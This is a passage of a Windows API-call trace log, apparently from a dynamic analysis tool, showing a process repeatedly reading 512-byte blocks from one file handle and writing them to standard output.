lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.379] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.379] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.380] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.380] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.381] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.382] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.383] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.383] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.383] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.383] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.383] GetFileType (hFile=0x50) returned 0x1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.384] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.384] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.384] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.384] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.384] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.389] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.389] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.389] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.389] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.389] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: 